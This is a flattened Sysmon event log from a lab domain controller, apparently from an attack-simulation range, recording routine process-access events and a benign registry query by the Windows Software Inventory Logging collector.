10341000x80000000000000003052Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:29.539{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003051Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:29.539{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003050Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:29.539{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003049Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:29.539{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003048Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:29.539{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003047Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:29.539{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-42C5-6000-9200-000000009A01}4392C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003046Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:29.539{08A6967A-42C5-6000-9100-000000009A01}29203140C:\Windows\system32\cmd.exe{08A6967A-42C5-6000-9200-000000009A01}4392C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003045Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:29.549{08A6967A-42C5-6000-9200-000000009A01}4392C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exeC:\Windows\system32\reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{08A6967A-42C5-6000-9100-000000009A01}2920C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\system32\reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64 10341000x80000000000000003044Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:29.539{08A6967A-42C5-6000-9000-000000009A01}31484100C:\Windows\system32\conhost.exe{08A6967A-42C5-6000-9100-000000009A01}2920C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003043Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:29.539{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003042Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:29.539{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003041Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:29.539{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003040Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:29.539{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003039Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:29.539{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003038Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:29.539{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003037Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:29.539{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003036Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:29.539{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003035Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:29.539{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003034Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:29.539{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-42C5-6000-9100-000000009A01}2920C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003033Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:29.539{08A6967A-42C5-6000-8F00-000000009A01}43523144C:\Windows\system32\cmd.exe{08A6967A-42C5-6000-9100-000000009A01}2920C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\msvcrt.dll+4ba7c|C:\Windows\system32\cmd.exe+103c4|C:\Windows\system32\cmd.exe+10910|C:\Windows\system32\cmd.exe+c36d|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003032Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:29.541{08A6967A-42C5-6000-9100-000000009A01}2920C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c C:\Windows\system32\reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-42C5-6000-8F00-000000009A01}4352C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /d /c C:\Windows\system32\silcollector.cmd configure 10341000x80000000000000003031Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:29.507{08A6967A-42C5-6000-9000-000000009A01}31484100C:\Windows\system32\conhost.exe{08A6967A-42C5-6000-8F00-000000009A01}4352C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003030Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:29.507{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-42C5-6000-9000-000000009A01}3148C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003029Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:29.507{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003028Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:29.507{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003027Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:29.507{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003026Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:29.507{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003025Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:29.507{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003024Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 